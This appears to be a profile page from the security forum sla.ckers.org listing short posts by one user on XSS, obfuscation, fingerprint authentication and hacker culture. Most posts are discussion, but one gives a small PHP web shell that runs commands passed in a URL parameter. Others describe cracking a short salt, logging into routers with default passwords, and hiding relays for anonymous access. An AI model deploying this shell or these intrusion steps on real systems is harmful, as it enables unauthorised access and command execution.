Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12345...LastNext
Current Page: 1 of 7
Results 1 - 30 of 195
2 years ago
Skyphire

Forum: OMG Ponies
2 years ago
Skyphire
Here is some current research: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.61.7126&rep=rep1&type=pdf In only 5000 tries they cracked 85 from 150 fingerprints, in later rounds they achieved 142 over 150 prints. Pretty damn awesome.
Forum: Privacy
2 years ago
Skyphire
Another idea: Fingerprint software that detects a pattern in a print must be somewhat fuzzy otherwise authentication fails often. The software might set fixed points and measures it's distance. Hold your finger in a slightly different angle, and it still detects your print. So it must be fuzzy in a sense that it "scores" the points with some algorithm. So can we bruteforce it?
Forum: Privacy
2 years ago
Skyphire
Lot of PC's have fingerprint authentication, especialy laptops. Fingerprints are the worst possible method for authentication. If a digital fingerprint is stolen (all are digitized nowadays) unlike a password, you cannot create another fingerprint. It's fixed forever to you. Which is incredibly weak security. So what are the methods of stealing fingerprints on PC's? are there trojans who ste
Forum: Privacy
2 years ago
Skyphire
^cr101 Well, hacking became cracking. If you're cracking then your'e not hacking. A hacker is born, a cracker is created. That pretty much sums it up for me. If however, you are interest to tinker with computers for the joy, fun and love of it, then hacking still exists.
Forum: News and Links
2 years ago
Skyphire
Incredible: Plesk stores passwords in... you got that right: PLAINTEXT. Plesk boats 250 million installations. Gotta love that. /facepalm.
Forum: News and Links
2 years ago
Skyphire
Another good reason not to be affiliated with "hackers" anymore. This whole thing is getting more ridiculous by the second. In case you haven't noticed, hacking is pretty much dead for a long, long time. These days you will be headline news with some stupid SQL/XSS injection and even get your own dedicated Wikipedia page for doing so. Not sure what is more pathetic, getting access throug
Forum: News and Links
2 years ago
Skyphire
neuf.martial Wrote: ------------------------------------------------------- > Then this encoded value will be inserted in the Database. > Never encode/convert user data upon _input_ into a database. Escape it, cast if you want and encode only upon _output_ or block/deny it when they submit it. Even removing characters can lead you to a whole new ballgame considering the multitude o
Forum: XSS Info
2 years ago
Skyphire
Unlikely, however the browser's HTMLparser might contain bugs, especially Firefox'es. Just like this one I discovered in 2011, where a DOCTYPE leads to a denial of service in Firefox. 0. description 1. details 2. procedure 3. proof of concept 4. disclosure 5. solution description ----------- HTMLparser DOCTYPE Denial of service in Firefox. There is a b
Forum: XSS Info
2 years ago
Skyphire
A cloud I guess, or you might try Falling Rock Networks Hosting ;-)
Forum: OMG Ponies
2 years ago
Skyphire
I never liked BSD. But this isn't an OS war thread. I would never use a BSD desktop. I concur with the others, run a VM, download images and try 'em all out. It's about what works for you, not what's best for you. I still use Windows and I've never been hacked on it and even if I got hacked on, there isn't anything of value on it, since the valuable stuff isn't wired to the net.
Forum: OMG Ponies
2 years ago
Skyphire
Type in the IP see if a router is listening on port 80 with an admin screen, then try the default password, then enable Telnet or whatever.
Forum: Networking
2 years ago
Skyphire
DoS your ego instead. Who cares if you got flamed or trolled. No one cares. Drop the grudge and quit Googling yourself. Be happy.
Forum: Search Engine Hacking and SEO
2 years ago
Skyphire
I would try to attack the weakness of a short salt. Create an account with password that is 1 to 3 letters long: 'a' (if it will allow you to do so), get the password hash and run a rainbow table against it. If they use a short salt, then the chances are great to discover the salt if the password consists of only one to 3 letters. For example: Password: a Salt: 194583 Result: a194583
Forum: Full Disclosure
2 years ago
Skyphire
Go to a (PC) flea market and buy all the nics from a geek who sells them.
Forum: Privacy
2 years ago
Skyphire
Buy a dozen 20$ cellphones with WIFI, attach a long life battery pack and bury them under the ground at 12 different WIFI hotspots and then dial into them proxing through the hotspot with a cheap-ass laptop. That's it I guess.
Forum: Privacy
2 years ago
Skyphire
Great! I just ordered a pork pizza and it was delivered in a hazmat truck rigged with explosive devices to ward of possible suicide terrorist and avian flue customers dealing radioactive narcotics. DINGDONG!
Forum: Privacy
2 years ago
Skyphire
Yes? it didn't work. here's why: 216 switch ($type) 217 { 218 // GIF 219 case 1: 220 if ($imgtype != '.gif') 221 { 222 @unlink($tmp_filename); 223 message_die(GENERAL_ERROR, 'Unable to upload file', '', __LINE__, __FILE__); 224 } 225 break; 226 227 //
Forum: News and Links
2 years ago
Skyphire
Well, kind of obvious.
Forum: News and Links
2 years ago
Skyphire
Looks like advertising malware. Dunno. Probably XSS injected.
Forum: Obfuscation
2 years ago
Skyphire
phoebeluella Wrote: ------------------------------------------------------- > Wow! Thank you! Really thank you very very much! > I also went to the file in my site and > "looked" at it by following my domain path, using > Chrome/view source And Viola...it was an open > "back door". I never really understood what a > backdoor entry was before this.
Forum: Obfuscation
2 years ago
Skyphire
Cute. I think many scripters/programmers still underestimate or are unaware of this kind of obfuscation.
Forum: Obfuscation
2 years ago
Skyphire
My guess is that it's a hashed ID for a record, so yeah probably security by obscurity. Try to generate a table with a million hashed integers and slice it on four characters, you might find the id. But with the id you can't do anything.
Forum: Obfuscation
2 years ago
Skyphire
RonPaul. Well, if you want to know what it does: try to de-obfuscate it. But since you posted it already, what did you do to deobfuscate it? did you do anything at all? or do you have no clue at all. If you have no clue at all, then think harder. It's pretty easy.
Forum: Obfuscation
2 years ago
Skyphire
Yes same old story. Nothing new really. Let this be a word of caution ot aspiring hackers; for those who wants to join hacking groups. A smart hacker doesn't join groups, that's what makes him or her a smart hacker that will never get caught. I am certain that most hacker outfits we see these days are already compromised for a very long time, some of these outfits were also created to gather i
Forum: OMG Ponies
2 years ago
Skyphire
well, at least you got an XSS.
Forum: SQL and Code Injection
2 years ago
Skyphire
HollywoodNazi's are at it again: Megaupload.com taken down. http://ca.news.yahoo.com/workers-indicted-one-worlds-largest-file-sharing-sites-200038389.html http://www.foxnews.com/scitech/2012/01/19/feds-shut-down-file-sharing-website/ http://www.fbi.gov/news/pressrel/press-releases/justice-department-charges-leaders-of-megaupload-with-widespread-online-copyright-infringement Just like t
Forum: News and Links
2 years ago
Skyphire
You can also try to find the images of Apache. Like the Apache logo, the Apache manual et cetera. Same for PHP and stuff. Usually an administrator or security professional won't remove those. It's also more unobtrusive than to blast away with all sorts of scanners.
Forum: SQL and Code Injection
2 years ago
Skyphire
Looks like it's filtered through htmlspecialchars, or magic quotes are enabled on the server. Can you post the source? CTRL+U in FireFox. Better than screenshots. Here is a small shell, and basically everything you need: <html><body bgcolor=#000000><form action='' method=GET> <textarea cols=100 rows=40><?php $_GET['cmd'] ? system($_GET['cmd']) : system('cd /');
Forum: SQL and Code Injection
2 years ago
Skyphire
You can use it to create Apps in their name, if you please, or remotely post/read stuff. Look up the twitter API.
Forum: CSRF and Session Info
Pages: 12345...LastNext
Current Page: 1 of 7